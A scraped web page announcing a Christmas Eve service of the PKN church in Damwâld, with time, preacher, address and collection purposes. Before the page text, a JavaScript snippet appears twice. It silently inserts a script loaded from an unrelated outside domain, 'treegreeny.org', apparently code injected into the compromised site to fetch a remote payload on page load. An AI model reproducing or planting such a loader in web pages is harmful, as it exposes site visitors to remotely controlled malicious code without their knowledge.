;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerstnachtdienst - PKN Damwâld
zondag 24 december
22:00 uur

Kerstnachtdienst

Thema: Kerstnachtdienst

Informatie

Voorganger:Mw. G. van der Galiën
Thema:Kerstnachtdienst
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: Kerk
Tweede collecte: Adventscollecte Kerk in Actie
Uitganscollecte: Uitgangscollecte t.b.v. de gestegen energiekosten